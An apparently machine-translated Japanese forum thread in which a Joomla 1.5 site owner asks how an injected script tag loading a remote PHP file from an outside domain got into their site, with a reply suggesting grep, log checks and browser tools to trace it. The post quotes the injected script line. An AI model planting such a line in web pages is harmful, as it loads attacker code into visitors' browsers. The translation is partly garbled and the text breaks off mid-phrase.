0
私のJoomla! (どこか)1.5のWebサイトは最近、XSS攻撃(それはこのようなものになると私はnoobのだ)であると思われるものの犠牲になった...次のコードは、サイト内に注入したJoomla! 1.5サイトがXSSの犠牲者になった
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
およびI」正確にはわからない。私はデータベースとファイルを検索して、結果がゼロになるように探しました。明白な何かがありますか?
あなたはそのテキストのフォルダを具体的にgrepしましたか?私はインジェクションが実際にはエンコードされたテキスト(エンコードされていないURLを読むとき)を持つ新しいシートを作成するのを見ました - そして、それらは単純にエンコードされたテキストをunencodeしてそれをどんなページ/モジュールにも挿入するPHPのスニペットを含みますPHPコードはから実行されます。この場合、あなたは決して見ることができません: 「追跡する」ことが不可能になり、エラーログをチェックし、 NoScriptとFirebugを入手して、JSがロードされている場所とどこからJSが読み込まれているかを確認します。 – Hanny
リンクが